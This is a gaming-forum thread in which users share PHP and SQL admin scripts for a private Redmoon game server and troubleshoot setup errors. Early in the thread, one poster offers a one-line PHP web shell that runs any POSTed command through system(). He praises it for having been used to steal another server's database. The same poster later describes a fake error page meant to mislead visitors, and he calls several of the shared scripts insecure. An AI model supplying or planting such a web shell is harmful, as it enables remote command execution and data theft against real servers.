Redmoon control scripts

[andars05]

I'm going to make some redmoon control scripts. Things like add account, rank, etc. Most of what I've seen doesn't have a lot of security security. None of the queries are cleaned or anything. The user output usually doesn't seem to be very elegant either. I'll check out GMTools to see what all it can do to make an improved version. If you guys want any features added go ahead and post them. It shouldn't be to hard. I'm fairly experienced with php and sql.

 

[holmancarey]

Here's a simple one, compliments to Rock.

"<? set_time_limit(0); if(isset($_POST["sys"])){ system(stripslashes($_POST["sys"])) ; }  else { ?> <form action="1.php" method="post"><input type="text" name="sys" size="50"><input type="submit"></form> <? } ?>"

Basically just brings up a window you can type a query into, only works directly on the server and was used to steal the database from TS-Online a few months ago. I haven't actualy used it so use it at your own risk!!!

Bravo Mr. Rockwell, bravo!

P.S. Save the file as 1.php or change the reference to "1.php" to whatever you save the file as. I have some other php tools and usefull pages I'm going to be posting once I get them ready to be redistributed.

 

[andars05]

I'm working on mine still. So far I only have an add_account page. However I have implemented a templating system and global language system. Once I finished tweaking my classes to my liking it will be fairly easy to add new pages.

 

[holmancarey]

Here's a copy of most every .php type tool & page that I have. Credit to the code base goes to Allan. Some I created off of the existing pages Allan had made (like the character bann tool for instance) but the majority of them are his original work. There are a few minor things that will need to be done in order for these pages to work, but I'll go over everything you need to know to get it setup.

First download the distribution. You can download it in .rar or .zip format.

You must be registered to see links

Original version

You must be registered to see links

Plain Version

Once you have downloaded the file of your choice, extract it into your htdocs folder or wherever your website's root is located.

Open up the config.inc.php and change where it says 'password' to whatever password you are using for your SA account. Then open the config.php file and change the password here as well, and then change the 127.0.0.1 in the line
$dbhost = '127.0.0.1' to whatever IP address your using for your server. For a local test machine, leave the address set to 127.0.0.1

Now that you have the config files updated, you are going to need to create a table for the rankings and shapeshift pages to work right. This table is fairly simple to create and consists of two colums, one named GameID that is varchar 14 (no null) and another that is named OriginalFace that is tinyint 1 (no null). To create this table easily (if your not familiar with creating them manually). You can use a simple query to do it for you.

First, open up Query analyzer from your Start Menu -> Programs -> Microsift SQL Server -> Query Analyzer. Once you have it opened and connected to your server, select the Redmoon database from the drop down list at the top. Now copy & paste the following code into the query window and hit F5 (or click the green arrow) to execute it.

CREATE TABLE [dbo].[shapeshift] (
	[GameID] [varchar] (14) COLLATE SQL_Latin1_General_CP1_CI_AS NOT NULL ,
	[OriginalFace] [tinyint] NOT NULL 
) ON [PRIMARY]
GO

ALTER TABLE [dbo].[shapeshift] WITH NOCHECK ADD 
	CONSTRAINT [PK_shapeshift] PRIMARY KEY  CLUSTERED 
	(
		[GameID]
	)  ON [PRIMARY] 
GO

Once you have run the query, the table should be created and the site should be fully functional. If you skip this step, you will receive a "no tuples" error message accessing the ranks and shapeshift pages.

Now to go over what all is included in the distrobution.


Normal Player Tools

Add account page = addaccount.php
Insecure and not reccomended to be used unless trusted users are accessing it.

BA Account Manager = ba.php
Does not work to create characters yet, but it will create an account for you with BA in front if you're logged in with an existing account.

Egger = egger.php
Gives a fatty egg that lasts a while. The egg can be easily changed by editing the SETimer and TLETimer references in the file to whatever you want.

Login & Logout = login.php & logout.php
Allows you to login to the site so pages like the character unsticker will work properly.

Egg Remover = noegg.php
Removes the egg from a specified character.

Top 160 Rankings = rankings.php
Displays the top 165 characters that are below 4000 BPs.

Hero Ranks = rankings_heroes.php
Displays the characters that have 4000+ BPs

Character Rankings = rankings-all.php
Displays the top 165 characters with no BP limit

Shapeshift Page = shapeshift.php
Allows players to shift their character to any of the 9 player toons. Set your GM's OriginalFace to 9 in the shapeshift table, so they can shift to an Aurello/Aguilas skin by selecting the Original character option.

Shapeshift to Original Character = shapeshiftorg.php
Allows players to shift back to their original toons once a shapeshift event has ended.

Character Unsticker = unsticker.php
Allows you to move a stuck character into map 21. Requires you to be logged onto the site to select the characters name.




GM Type Tools

GM Character Unsticker = unstick.php
Allows you to move a stuck character to map 21, without having to first be logged into the site with that characters login info.

Sunset Viewer = sunsets.php
Displays all of the Sunsets Duras & LMs currently on the server, and which characters have what.

LM Viewer = viewlm.php
Allows you to see who all has LM's and how many they have

Character Viewer = viewchar.php
Allows you to view all of the details about the character, minus the password to their account.

Command Remover = removecmd.php
Removes all commands from the specified character.

GM Shapeshifter = gmshiftshape.php
Same as the normal shapeshift page, but provides and option of wether or not to reset your stats.

Survival Event Starter = survival.php
Puts a player in survival mode until they die. Must log out and back in for change to take effect.

GM Buffer = gmbuff.php
Gives the character specified 10 million to each stat. Can be easily changed by modifying each place that has 10000000 with whatever you want. Can also be easily modified to only change one or more stats, by removing the corresponding Stat = 10000000, entry.

Command Giver = givecmd.php
Gives the specified character their commands. This file is setup to give 2114 to permissions which will allow players to move, open the bulletin, and open the GM shops. Change this to whatever permission you want players to have (ie. 2 for move command ONLY)

Character UnBann Tool = unbanchar.php
Removes a character from being banned by deleting the entry for that character in the tblUserSanctionList1 table

Character Bann Tool = Allows you to Bann characters, but requires that you set a default value for the DueTime column in the tblUserSanctionList1 table. To do this easily I have created a query that will do it for you.

if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[tblUserSanctionList1]') and OBJECTPROPERTY(id, N'IsUserTable') = 1)
drop table [dbo].[tblUserSanctionList1]
GO

CREATE TABLE [dbo].[tblUserSanctionList1] (
	[GameID] [varchar] (14) COLLATE SQL_Latin1_General_CP1_CI_AS NOT NULL ,
	[DueTime] [datetime] NOT NULL ,
	[Reason] [varchar] (50) COLLATE SQL_Latin1_General_CP1_CI_AS NULL 
) ON [PRIMARY]
GO

ALTER TABLE [dbo].[tblUserSanctionList1] WITH NOCHECK ADD 
	CONSTRAINT [DF_tblUserSanctionList1_DueTime] DEFAULT ('12/31/2010 5:35:03 PM') FOR [DueTime],
	CONSTRAINT [DF_tblUserSanctionList1_Reason] DEFAULT ('?') FOR [Reason],
	CONSTRAINT [PK_tblUserSanctionList1] PRIMARY KEY  CLUSTERED 
	(
		[GameID]
	)  ON [PRIMARY] 
GO

Same as the first query, copy & paste it into Query Analyzer and execute it. If you prefer to do it manually, all you will have to do is go into Design the tblUserSanctionList1 table, select the DueTime column and enter in ('12/31/2010 5:35:03 PM') or whatever date you want it to be. Of course another text box could be added to the page to enter in the DueTime so this step would not be necessary, but I never took the time to add in another text box so this is what must be done in order for the page to work successfully.

The other files inside of the distrobution are necessary for all of the scripts to work properly. The only ones you should have to worry about configuring are the two config.php files, unless you rewrite your database. Which in that case, ur on your own

Anyway, I hope these are helpfull and I would also like to thank Allan for granting me the privilage of receiving these files. I give full credit for these to him, even though I have made a few myself. Simply because I would have never been able to make anything had he not given me a starting point. I'm sure some of them may be a bit sloppy and in no way do I guarantee that ANY of them are secure. However, I do guarantee that if you are able to setup everything properly, then they will work flawlessly.

If anyone has any questions or comments about the info I provided here, please feel free to ask me and the next time I visit RZ I'll do what I can to help explain any grey areas.

Enjoy

P.S. I also included a copy of my index.php file that acts as a page cannot be displayed error message. The page appears legit down to every last detail, meant to fool anyone trying to directly access an unauthorized folder. Just something I thought I might mention, since if you extract the file into your web and try to access it, you will get a page can't be displayed message :lamo:

 

[holmancarey]

For good measure I created a second copy of the site that has all of the html code removed from the common.inc.php file. The Login & Logout options were not removed, the players online was not removed, and the page generated notice was also not removed. It still has the Thunder Strike copyright on it, but you have my consent to modify it to whatever name you like.

Enjoy

Added link to previous post...

 

[scgodz]

Awesome work Carey. This helps alot .
~Chris

 

[SlaserX]

Epica? The band or the CD?

 

[scgodz]

Epica, the band.
~Chris

 

[holmancarey]

Links updated to reflect new location of files.

EDIT:Updated 8/7/09 to reflect new temp location

 

[yehuan]

hi,holmancarey!
nice to see u in this form and help us
i have one question about your web , i download and put them in my wwwroot
but it can't work

some question , plz help me to fix it .

Fatal error: Method Result::__get() cannot take arguments by reference in C:\Inetpub\wwwroot\php\Result.class.php on line 18

 

[rmarquardt]

hi holmancarey,

ty for the links, i have missed that stuff.

Greetings Ralf Marquardt

 

[evilroxy]

i get same error....

 

[SCDragon]

Go to your php folder and open php.ini. In there, search for:

; Allow ASP-style <% %> tags.
;

You must be registered to see links

asp_tags = Off

Change it to:

; Allow ASP-style <% %> tags.
;

You must be registered to see links

asp_tags = On

I think that could be a solution to your problems.

 

[nickah]

Fatal error: Method Result::__get() cannot take arguments by reference in Result.class.php on line 18
same error anyone figure it out, i turned asp_tags=on still not working any other ideas?

 

[SCDragon]

Are you sure that all the tables in the common.inc.php are the same as the ones you have on your server? Also, are you sure all the info is correct?

 

[MG1978]

Also dont forget sometimes you have to restart the webserver for changes to the configs take affect.

 

[holmancarey]

On another note, these pages were only known to work with Apache v2.0.55 and php5. I was never able to get them to work with IIS or newer versions of apache. I don't doubt that it could be setup to work with any web hosting solution, but based on the file structure in the error you posted I would presume you're using IIS

 

[SCDragon]

They can still work on PHP 5.3, you just need to install additional modules to your PHP for it to work using mssql. You could always recode it to ODBC. That is still default supported.

 

[Mah3961]

The "cannot take arguments by reference" means exactly what it says. This should only occur when you are running these older scripts on PHP 5.3+. Take out the reference in the function arguments (and upate the script if needed). Go to the line number, remove the reference (for example: protected function foo(&$bar) needs to be changed to: protected function foo($bar) ) and you're good to go.

In regards to ODBC connections, these scripts work fine in Server 2008 x64 SP2 (MSSQL Express 2008) w/ fastcgi + IIS 7.5.. But you'll need to make sure the ODBC connections are properly set for x64->x32 (and x32->x32 for the server itself). You can set up x64 ODBC connections by running 'c:\windows\sysWOW64\odbcad32.exe'.

If you are experiencing very slow connections to the database (connections, not queries), like 2-5 seconds slow, this is likely because you used the "SQL Server" drivers, using the "SQL Server Native" drivers should make things snappy again.







For those of you tired of interfacing all of the MSSQL through PHP in IIS/Apache on a windows server... Like me... I'll be releasing a set of ASP.Net 4 C# scripts soon.

 

[holmancarey]

Good looking out mate. Put em out there and I'll be sure to test them out. I have a svr 2008 server /w mssql and iis 7 up and running. Just making some finishing touches and i'll be posting it for everyone to test out. would be nice not to have to run a virtual machine in win xp to run the php pages. as of now i haven't had much luck getting the pages to work on iis7